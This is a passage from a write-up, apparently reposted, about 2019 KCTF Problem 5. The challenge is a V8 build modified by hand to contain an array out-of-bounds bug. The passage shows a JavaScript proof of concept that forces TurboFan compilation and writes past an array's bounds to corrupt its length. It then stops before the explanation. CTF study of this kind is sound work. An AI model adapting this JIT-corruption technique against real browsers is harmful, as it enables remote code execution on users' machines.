Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5
Introduction to the KCTF Problem
Problem 5, 小虎还乡, of the 2019 KCTF competition ships a deliberately vulnerable V8 build. This build contains an array out-of-bounds (overflow) bug, but it is not a bug in upstream V8: the challenge authors modified a few V8 source files to introduce it by hand. This post walks through the exploitation of that bug step by step.
PoC of the V8 Array Overflow Vulnerability
```javascript
var buggy;

var overwrite_length = () => {
    // Build an index from a Date value whose range the optimizing compiler reasons about
    let oob = new Date(-864000000 * 15000000);
    oob = Math.abs(oob.getDate() - 16) >> 5;
    buggy = [1.1];
    // The store at oob * 4 is the out-of-bounds write in the modified V8 build
    buggy[oob * 4] = 1.1;
};

// Call the function many times so it gets JIT-compiled by TurboFan
for (let i = 0; i < 0x10000; i++) overwrite_length();
```
This PoC triggers the array overflow bug. The following sections explain how it works.